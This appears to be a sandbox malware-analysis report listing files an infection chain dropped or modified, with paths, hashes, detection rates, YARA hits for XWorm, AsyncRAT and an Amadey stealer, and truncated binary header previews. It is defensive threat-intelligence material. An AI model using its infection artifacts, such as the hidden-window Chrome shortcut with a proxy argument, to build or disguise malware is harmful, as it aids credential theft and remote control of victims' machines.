                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....=.f.................n............... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...4m... ...n.................. ..`.rsrc................p..............@..@.reloc...............v..............@..B........................H........g..H%......&.....................................................(....*.r...p*. ....*..(....*.rC..p*.s.........s.........s.........s.........*.rg..p*. g.h.*.r...p*. r...*.r/..p*. ....*.r...p*. *p{.*.r...p*. ..?.*..((...*.r...p*. ...*.r...p*. S...*.(+...-.(,...,.+.(-...,.+.(*...,.+.()...,..(Z...*"(....+.*"(....+.*&(9...&+.*.+5sk... .... .'..ol...(,...~....-.(b...(T...~....om...&.-.*.ra..p*. ....*.r...p*. .y4.*.r)..p*. E/..*.r...p*.r...p*.rU..p*.r...p*. ..'.*.r...p*.
                                                        Process:C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe
                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:modified
                                                        Size (bytes):104448
                                                        Entropy (8bit):4.851224245014386
                                                        Encrypted:false
                                                        SSDEEP:3072:pbqQQQQQQQQkQQQQQQQQQQQQQQ+QQQjQQQQQQQQQQQQQQxQQQQQQQQQjQQQQQQQ3:5qQQQQQQQQkQQQQQQQQQQQQQQ+QQQjQ+
                                                        MD5:771B8E84BA4F0215298D9DADFE5A10BF
                                                        SHA1:0F5E4C440CD2E7B7D97723424BA9C56339036151
                                                        SHA-256:3F074FB6A883663F2937FD9435FC90F8D31CEABE496627D40B3813DBCC472ED0
                                                        SHA-512:2814EF23653C9BE5F5E7245AF291CF330C355ED12B4DB76F71B4DE699C67A9FFD1BDC0CC1DF5352335B57AB920404B9C8E81CD9257527264BDE4F72A53700164
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Avira, Detection: 100%
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        • Antivirus: ReversingLabs, Detection: 88%
                                                        Joe Sandbox View:
                                                        • Filename: file.exe, Detection: malicious, Browse
                                                        • Filename: file.exe, Detection: malicious, Browse
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....q................0.................. ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H.......Ph..lD..........................................................C........s..Q....sECbF.h..o....e?.+.x.28+.{u.)..y....-i.$.n. y....R`..}...........ds.g..0._e#....&...K......._..|l.d.z..........6..>...M...!.a*..c.k.......%.......1..o.........F.b.."............cz...)..cg.-@.w.....4.*.M4...@8....M..dO..|z..Zca...69.......................................................................CC.........6....6....................................................8..8.
                                                        Process:C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe
                                                        File Type:ASCII text
                                                        Category:dropped
                                                        Size (bytes):23
                                                        Entropy (8bit):3.82790978214397
                                                        Encrypted:false
                                                        SSDEEP:3:qIJMyAWRwo8n:q0CWRH8n
                                                        MD5:0B7D0E3C4F447BCF36DCA919DFEF1607
                                                        SHA1:17C3A0B1A4773EC4F168CDC24904B792FADC8F2E
                                                        SHA-256:4F8F4E089917FBCCFC43593222BF9B17E43EDD9CD4BEF59B9152D4F8239C798D
                                                        SHA-512:E6B37EB4F155A6F6F812721E97DB4CECDCBFEFE63C3F370E35D03CF20B858C08AAE82AFAD09043C55FF047A895827716D3003EE35A8C6D8B0724AB0CB4AC1B97
                                                        Malicious:false
                                                        Preview:Invalid request header.
                                                        Process:C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe
                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:modified
                                                        Size (bytes):96256
                                                        Entropy (8bit):5.97238192300277
                                                        Encrypted:false
                                                        SSDEEP:1536:1z8H8uTSHKoKlDeE0C3shB1ueVby8EXEFA4Xib6TWcgMfAOISZsw61EmS:+c/q/l6EP3mvuwby8EXuhX6cgXOI0stE
                                                        MD5:DB5717FD494495EEA3C8F7D4AB29D6B0
                                                        SHA1:39BA82340121D9B08E9CF3D4BA6DFCB12EB6C559
                                                        SHA-256:6B59309AB12F1859A94FB2CE1C98639B2A538E6E098FFAC127E45C29733BD993
                                                        SHA-512:B16C7BFFC8418A0349E5189D61439DF325D2AB33A42C720380A305DECDE00348F83D96B6C263A95DC253128EB0E47B1A3DC96F8F115DA868FF9227B9A40882DE
                                                        Malicious:true
                                                        Yara Hits:
                                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\ProgramData\YAPNXRPmcarcR4ZDgC81Tbdk.exe, Author: Joe Security
                                                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\ProgramData\YAPNXRPmcarcR4ZDgC81Tbdk.exe, Author: Joe Security
                                                        • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\ProgramData\YAPNXRPmcarcR4ZDgC81Tbdk.exe, Author: ditekSHen
                                                        Antivirus:
                                                        • Antivirus: Avira, Detection: 100%
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        • Antivirus: ReversingLabs, Detection: 84%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....=.f.................n............... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...4m... ...n.................. ..`.rsrc................p..............@..@.reloc...............v..............@..B........................H........g..H%......&.....................................................(....*.r...p*. ....*..(....*.rC..p*.s.........s.........s.........s.........*.rg..p*. g.h.*.r...p*. r...*.r/..p*. ....*.r...p*. *p{.*.r...p*. ..?.*..((...*.r...p*. ...*.r...p*. S...*.(+...-.(,...,.+.(-...,.+.(*...,.+.()...,..(Z...*"(....+.*"(....+.*&(9...&+.*.+5sk... .... .'..ol...(,...~....-.(b...(T...~....om...&.-.*.ra..p*. ....*.r...p*. .y4.*.r)..p*. E/..*.r...p*.r...p*.rU..p*.r...p*. ..'.*.r...p*.
                                                        Process:C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe
                                                        File Type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):675840
                                                        Entropy (8bit):7.998216130139266
                                                        Encrypted:true
                                                        SSDEEP:12288:nQZ3hb7F0Rz5oquPojKv3rLMmVIhF2nde4S9MQfh0/Al2B4KtFejEqhPBBl0:G8zOFPOKzLM0k4dQf2B1E4q5Bs
                                                        MD5:8083FED730E151BF47528621DB8E7FF8
                                                        SHA1:4AB5E2EB5C6326FD68704CDC5A4F719D332F51A6
                                                        SHA-256:AB0CA1D93238D0EFC02A41A7B311EFE3FC07C042F22D0608D33EA5313A667E55
                                                        SHA-512:A36F22356558565A90107F3618D9D9AC8A20DA73616AA97A87D3EA41C8F444847A6BB56856FEAE87A1CA5C6CC748BF6CE1C43D5E348DD9EA80CDD3C3DBD0D47B
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Avira, Detection: 100%
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        • Antivirus: ReversingLabs, Detection: 92%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................."...0..H............... .....@..... ....................................`...@......@............... ..................................n............................................................................................ ..H............text....G... ...H.................. ..`.rsrc...n............J..............@..@........................................H.......d[..x...........................................................8.#G..d..P.6.>..(.....=#..U...Ri..D.......H.x..7.z.)V.?2..t..s....A*]..4..rI0 P..h.s.u...;P......u...7....g....`........D..a..p.......nRa+5.ux.*r....!6...}...{...A.6.9../W8..'...e...U|.x+Tq...7+9G.t.....=...J....E[.._.....MX.....!@9..6.]..A.....t{."V.i...%..-.Ld$....q.....-.*.x.b.^}3:c_.D..k^....~.48A.u.R..dc.l....o.<. ...P.X...$H..vN.2...?y6.~Y."..3..............W.....CH'...;.... F*f......C.H.
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:41 2023, mtime=Wed Oct 4 13:16:54 2023, atime=Wed Sep 27 04:28:27 2023, length=3242272, window=hide
                                                        Category:dropped
                                                        Size (bytes):2104
                                                        Entropy (8bit):3.4508019039178133
                                                        Encrypted:false
                                                        SSDEEP:48:8Sarl2dfTXd3RYrnvPdAKRkdAGdAKRFdAKRE:8SarlOw
                                                        MD5:39DE4D465FAF69FE74B81A9383AE84D5
                                                        SHA1:42C6F26F955BED80484D9D524925A00886544E18
                                                        SHA-256:2846CF5DAF4E75FE7320A09459020CC71AB5CDD03A4FD280091C4DDEEA585E1E
                                                        SHA-512:B41BF70EBD057E0DCCA8937661BB4C5F192789B19A0C703D705F31A8F713651876476688E753E6EEB270E605357FAE080EA8AB82F04F712E0294403BB17F9EC9
                                                        Malicious:false
                                                        Preview:L..................F.@.. ......,....2.]m.......q.... y1.....................#....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IDW.r....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VDWUl....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VDWUl....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VDWUl..........................."&.A.p.p.l.i.c.a.t.i.o.n.....`.2. y1.;W.+ .chrome.exe..F......CW.VDW.r..........................,.6.c.h.r.o.m.e...e.x.e.......d...............-.......c............F.......C:\Program Files\Google\Chrome\Application\chrome.exe....A.c.c.e.s.s. .t.h.e. .I.n.t.e.r.n.e.t.;.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.!.-.-.p.r.o.x.y.-.s.e.r.v.e.r
                                                        Process:C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):42
                                                        Entropy (8bit):4.0050635535766075
                                                        Encrypted:false
                                                        SSDEEP:3:QHXMKa/xwwUy:Q3La/xwQ
                                                        MD5:84CFDB4B995B1DBF543B26B86C863ADC
                                                        SHA1:D2F47764908BF30036CF8248B9FF5541E2711FA2
                                                        SHA-256:D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
                                                        SHA-512:485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE
                                                        Malicious:false
                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..
                                                        Process:C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):42
                                                        Entropy (8bit):4.0050635535766075
                                                        Encrypted:false
                                                        SSDEEP:3:QHXMKa/xwwUy:Q3La/xwQ
                                                        MD5:84CFDB4B995B1DBF543B26B86C863ADC
                                                        SHA1:D2F47764908BF30036CF8248B9FF5541E2711FA2
                                                        SHA-256:D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
                                                        SHA-512:485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE
                                                        Malicious:false
                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):1119
                                                        Entropy (8bit):5.345080863654519
                                                        Encrypted:false
                                                        SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0Hj
                                                        MD5:88593431AEF401417595E7A00FE86E5F
                                                        SHA1:1714B8F6F6DCAAB3F3853EDABA7687F16DD331F4
                                                        SHA-256:ED5E60336FB00579E0867B9615CBD0C560BB667FE3CEE0674F690766579F1032
                                                        SHA-512:1D442441F96E69D8A6D5FB7E8CF01F13AF88CA2C2D0960120151B15505DD1CADC607EF9983373BA8E422C65FADAB04A615968F335A875B5C075BB9A6D0F346C9
                                                        Malicious:false
                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                        Process:C:\Users\user\AppData\Local\Temp\591950\Shipment.pif
                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                        Category:dropped
                                                        Size (bytes):1414800
                                                        Entropy (8bit):7.827189910944366
                                                        Encrypted:false
                                                        SSDEEP:24576:UzZ1Futzu9df939+wlQ+u6M6NrPLyPts+5+OgoSsKWF5DcJ14lWCqMYDe1EpmqIu:UvF4a9d9tnlQ+u96NyPtP5+1GKWF5gzn
                                                        MD5:DB2A12EDC73769F2F2B6B01545AFE2C3
                                                        SHA1:73DC44FB0753296F51B851299F468031CEB77B54
                                                        SHA-256:E6DB7D34B498982601B2C45AC5B2A1C1B9502E502514CCFFAE9862F2AA719F42
                                                        SHA-512:DADF36BC9C5D88C28B9064892CC263C912CE668435B71802DF756C0A4E680F8407011D36498A2511DDA7165AEA866C0AE794F9EC8FBCC42C7DA1661399316CE4
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 39%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<.ydx..7x..7x..7_Hz7{..7_Hl7i..7x..7..7q..7s..7q..7y..7q..7y..7Richx..7........................PE..L....l.K.................h...@...B...4............@..................................................................................................................................................................................................text....g.......h.................. ..`.rdata...............l..............@..@.data...............................@....ndata...................................rsrc...............................@..@........................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Users\user\AppData\Local\Temp\591950\Shipment.pif
                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):104448
                                                        Entropy (8bit):4.851224245014386
                                                        Encrypted:false
                                                        SSDEEP:3072:pbqQQQQQQQQkQQQQQQQQQQQQQQ+QQQjQQQQQQQQQQQQQQxQQQQQQQQQjQQQQQQQ3:5qQQQQQQQQkQQQQQQQQQQQQQQ+QQQjQ+
                                                        MD5:771B8E84BA4F0215298D9DADFE5A10BF
                                                        SHA1:0F5E4C440CD2E7B7D97723424BA9C56339036151
                                                        SHA-256:3F074FB6A883663F2937FD9435FC90F8D31CEABE496627D40B3813DBCC472ED0
                                                        SHA-512:2814EF23653C9BE5F5E7245AF291CF330C355ED12B4DB76F71B4DE699C67A9FFD1BDC0CC1DF5352335B57AB920404B9C8E81CD9257527264BDE4F72A53700164
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Avira, Detection: 100%
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        • Antivirus: ReversingLabs, Detection: 88%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....q................0.................. ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H.......Ph..lD..........................................................C........s..Q....sECbF.h..o....e?.+.x.28+.{u.)..y....-i.$.n. y....R`..}...........ds.g..0._e#....&...K......._..|l.d.z..........6..>...M...!.a*..c.k.......%.......1..o.........F.b.."............cz...)..cg.-@.w.....4.*.M4...@8....M..dO..|z..Zca...69.......................................................................CC.........6....6....................................................8..8.
                                                        Process:C:\Users\user\AppData\Local\Temp\591950\Shipment.pif
                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):1104936
                                                        Entropy (8bit):7.998181628509962
                                                        Encrypted:true
                                                        SSDEEP:24576:lxaesWtTVxFP96Hu0jjjfQNggJRhc2BIVTit:3FsWTzqjjW/BV
                                                        MD5:8E74497AFF3B9D2DDB7E7F819DFC69BA
                                                        SHA1:1D18154C206083EAD2D30995CE2847CBEB6CDBC1
                                                        SHA-256:D8E81D9E336EF37A37CAE212E72B6F4EF915DB4B0F2A8DF73EB584BD25F21E66
                                                        SHA-512:9AACC5C130290A72F1087DAA9E79984565CCAB6DBCAD5114BFED0919812B9BA5F8DEE9C37D230EECA4DF3CCA47BA0B355FBF49353E53F10F0EBC266E93F49F97
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        • Antivirus: ReversingLabs, Detection: 100%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...\..f................................. ........@.. ....................... ............`.....................................O.......................(&........................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H...........................................................................L.v.lT.p#.E..'&..@cC...tE.....% ...pr*QA.U.v6..V.=.Cx..G.H.E.....i.....(hh.q.Bf..}...gL-.S.1),p.....$.8.ij3.....7....!Ts......T.[...X..PUE.c.j...s.].E........q.X.wsS.Y....g)......7I...OK..m(..d.(.T........0`.V`...o....E.G...#.I..q.....lh9..+........>6Q..=.S ...........-....#..].......rA.R..........1?.[..}l....jqD.$....N..xE1p....x[.h~.....i..d...u.!x.o..D..yue...S../z..>.|.!. .0.^.
                                                        Process:C:\Users\user\AppData\Local\Temp\591950\Shipment.pif
                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):330792
                                                        Entropy (8bit):7.984907013196583
                                                        Encrypted:false
                                                        SSDEEP:6144:kImw3mswWc3KcEUffTOR/PmB7ZegrbgykDDCT2qDx0j6ibCMvUkBEO:k+wWcXbwmfXK62qSjPbkkBEO
                                                        MD5:D6FCA3CD57293390CCF9D2BC83662DDA
                                                        SHA1:94496D01AA91E981846299EEAC5631AB8B8C4A93
                                                        SHA-256:74E0BF30C9107FA716920C878521037DB3CA4EEDA5C14D745A2459EB14D1190E
                                                        SHA-512:3990A61000C7DAD33E75CE1CA670F5A7B66C0CE1215997DCCFCA5D4163FEDFC7B736BCA01C2F1064B0C780ECCB039DD0DE6BE001C87399C1D69DA0F456DB2A8E
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        • Antivirus: ReversingLabs, Detection: 96%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f................................. ........@.. .......................@............`.....................................S.......................(&... ......p................................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H.........................................................................#...t..j. `t-...z.....-....r.N..e.k..MXw..a.bj......#.O...1..$....OU.........]AM...K!].,..Z........w...R...^#.U..(.Q.D}z......m..._.. ".!..z.#.79...y.Y.2......lc...5..>.l...[..W.I.C......9...FkJ..}.X_X.*"...qP.4...p.X"..d6.&....\...a...]".Tv>.@..GIc.4...P....J..zj.pr.y.r.*.fH...6.......#.....kqzT+.S....0.A..p.1.....f..|.P.#.XX..m......+p.:.+...q.....#X...},nh.L.N.'.,..0|:.r.E.3..%Y..u
                                                        Process:C:\Users\user\AppData\Local\Temp\591950\Shipment.pif
                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):492544
                                                        Entropy (8bit):6.391116117275591
                                                        Encrypted:false
                                                        SSDEEP:12288:UHdftnB3Zp+52J9+62HHLhJ3er8XSwW0:UNz3ZwwJ9+7HFnXP
                                                        MD5:F9A4F6684D1BF48406A42921AEBC1596
                                                        SHA1:C9186FF53DE4724EDE20C6485136B4B2072BB6A6
                                                        SHA-256:E0A051F93D4C1E81CC142181D14249E246BE4C169645D667267134B664E75042
                                                        SHA-512:67294A47DFEF6ABA404939497C403F93318841E9C5EE28B706F7506B5DFF2630381E28E86F6DCBFDFF2427092A515DB1DC0A04E334E7F8DE8B0B682269FF88FD
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        • Antivirus: ReversingLabs, Detection: 82%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+..J...J...J...<...J...<#..J...<...J...2...J...J...J...<...J...<'..J...< ..J..Rich.J..................PE..L.....jd.....................NA......K............@...........................F.....i"..........................................d.....D.H...........................p....................... 7.......6..@............................................text............................... ..`.data.....?......|..................@....rsrc...H.....D......n..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Users\user\AppData\Local\Temp\591950\Shipment.pif
                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):6646953
                                                        Entropy (8bit):6.633823221893971
                                                        Encrypted:false
                                                        SSDEEP:49152:P2OI2oMyZ4NG02ebe3l7i0s1Nc9blH6xzR1CcLPGj8kiaWOJfuYuCvAHZ+WcfZgJ:jJbiHlHOR1CcLPGj8kiaW98XqVyWPt
                                                        MD5:F4C78D18C5B5CB531C897F23CF3D3FED
                                                        SHA1:5C0F3D158F3A4DE86AB0C811CDD945236AFD4740
                                                        SHA-256:4553D0B891772C5170F9E840AE21F514C50C92636462A1BC785E536857456321
                                                        SHA-512:705A256CE81E6F9C62CD8D3230492FA46BA70F829A0480794CC968C2B53E5EA940482D9E710DCF4B7AB3D1E8281995E6FBA9D309F60FF01689A85E2324E7D995
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 71%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0..f..^.)&.........#..G..PZ...f...........G...@.................................Y.f....... ......................0..B....@...............................p..D$..........................dzH......................A...............................text....G.......G.................`.P`.data.........G.......G.............@.`..rdata..x.....G.......G.............@.`@/4............H......tH.............@.0@.bss......f..@L.......................`..edata..B....0....... L.............@.0@.idata.......@......."L.............@.0..CRT....4....P.......,L.............@.0..tls.........`........L.............@.0..reloc..D$...p...&...0L.............@.0B/14..................VZ.............@..B/29.................^Z.............@..B/41.....XL...`...N....\.............@..B/55.....B............T\.............@..B/67.....T............8].............@.0B/80.....a............V].
                                                        Process:C:\Users\user\AppData\Local\Temp\591950\Shipment.pif
                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):2846145
                                                        Entropy (8bit):6.162330655717327
                                                        Encrypted:false
                                                        SSDEEP:49152:kpiVaJ9m+8FdK1BZKVD2CMwbbIip7q18N/jH1:ks3+11vKV7Fs89jH1
                                                        MD5:FD2DEFC436FC7960D6501A01C91D893E
                                                        SHA1:5FAA092857C3C892EAB49E7C0E5AC12D50BCE506
                                                        SHA-256:BA13DA01C41FA50EC5E340061973BC912B1F41CD1F96A7CAE5D40AFC00FF7945
                                                        SHA-512:9A3E1F2DC5104D8636DC27AF4C0F46BDB153FCFADA98831B5AF95EEB09BB7EF3C7E19927D8F06884A6837E10889380645B6138644F0C08B9CB2E59453041EC42
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 92%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...NF.f..$."&.........#.....B ..x`...............@...................................,....... .........................B.......................................`5..........................dX.......................................................text...............................`.P`.data...............................@.`..rdata..X...........................@.`@/4......8....p.......L..............@.0@.bss.....w`..0........................`..edata..B...........................@.0@.idata..............................@.0..CRT....4...........................@.0..tls................................@.0..reloc..`5.......6..................@.0B/14.....p....0.......H .............@..B/29..........@.......P .............@..B/41......K.......L....!.............@..B/55..........@.......B".............@..B/67..... ....0.......&#.............@.0B/80.....Q....P.......D#.
                                                        Process:C:\Users\user\AppData\Local\Temp\591950\Shipment.pif
                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):6663286
                                                        Entropy (8bit):6.633833679677087
                                                        Encrypted:false
                                                        SSDEEP:98304:LMx3VZorofxDRAwXHf39g5MrvketaC+sbUefI:iFISthXf9gKrr1pfI
                                                        MD5:F9E43AEFFF1576AA7ADFC1688D5A24BF
                                                        SHA1:9ACBCA30ABA919B26F1439668EBDB1B6A38E46EA
                                                        SHA-256:B1FCE873959EE7296C5D7307FC3E4302BC013C8DDCE57EE77708A94E4416653A
                                                        SHA-512:69D35C334B4670BDA9E6045738CD6779E16EC2C712CC98FD2FA595829A7D78F62739C59EFACA61D4BC190F0A60D722A283F2046276338125D70545D679EE1532
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 75%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.2_.S&.........#..G...Z...f...........G...@...................................f....... ......................`..B....p..................................$.............................H......................q...............................text.....G.......G.................`.P`.data.........G.......G.............@.`..rdata........H.......G.............@.`@/4......<.....H.......H.............@.0@.bss....T.f..pL.......................`..edata..B....`.......JL.............@.0@.idata.......p.......LL.............@.0..CRT....4............VL.............@.0..tls.................XL.............@.0..reloc..$........0...ZL.............@.0B/14...................Z.............@..B/29..................Z.............@..B/41.....XL.......N...:\.............@..B/55.....B.............\.............@..B/67.....T............l].............@.0B/80.....a.............].
                                                        Process:C:\Users\user\AppData\Local\Temp\591950\Shipment.pif
                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):425984
                                                        Entropy (8bit):6.513416731775012
                                                        Encrypted:false
                                                        SSDEEP:12288:ISqMakU3v+GYLWIjD9dSbvBG5u2uQjdQco:jq53v+G4Wwub8Ljaco
                                                        MD5:F5D7B79EE6B6DA6B50E536030BCC3B59
                                                        SHA1:751B555A8EEDE96D55395290F60ADC43B28BA5E2
                                                        SHA-256:2F1AFF28961BA0CE85EA0E35B8936BC387F84F459A4A1D63D964CE79E34B8459
                                                        SHA-512:532B17CD2A6AC5172B1DDBA1E63EDD51AB53A4527204415241E3A78E8FFEB9728071BDE5AE1EEFABEFD2627F00963F8A5458668CD7B8DF041C8683252FF56B46
                                                        Malicious:true
                                                        Yara Hits:
                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\exbuild[1].exe, Author: Joe Security
                                                        Antivirus:
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        • Antivirus: ReversingLabs, Detection: 87%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L......f............................E.............@.......................................@.................................D...................................<L......8...............................@............................................text............................... ..`.rdata..8...........................@..@.data...|f... ...4..................@....rsrc................0..............@..@.reloc..<L.......N...2..............@..B........................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Users\user\AppData\Local\Temp\591950\Shipment.pif
                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):327168
                                                        Entropy (8bit):6.641160964790137
                                                        Encrypted:false
                                                        SSDEEP:6144:nx9ooeWfqpO3HS0f+KIXDyqR9NKtU5tyt7EJtdb/yw0cV3IOfe52GGZ2OGe+CKip:nx9onKM2+KIXrLGw0ci22OGe+CKiV9pz
                                                        MD5:0EC1F7CC17B6402CD2DF150E0E5E92CA
                                                        SHA1:8405B9BF28ACCB6F1907FBE28D2536DA4FBA9FC9
                                                        SHA-256:4C5CA5701285337A96298EBF994F8BA013D290C63AFA65B5C2B05771FBBB9ED4
                                                        SHA-512:7CAA2416BC7878493B62A184DDC844D201A9AB5282ABFA77A616316AF39FF65309E37BB566B3E29D9E764E08F4EDA43A06464ACAF9962F911B33E6DBC60C1861
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Avira, Detection: 100%
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        • Antivirus: ReversingLabs, Detection: 96%
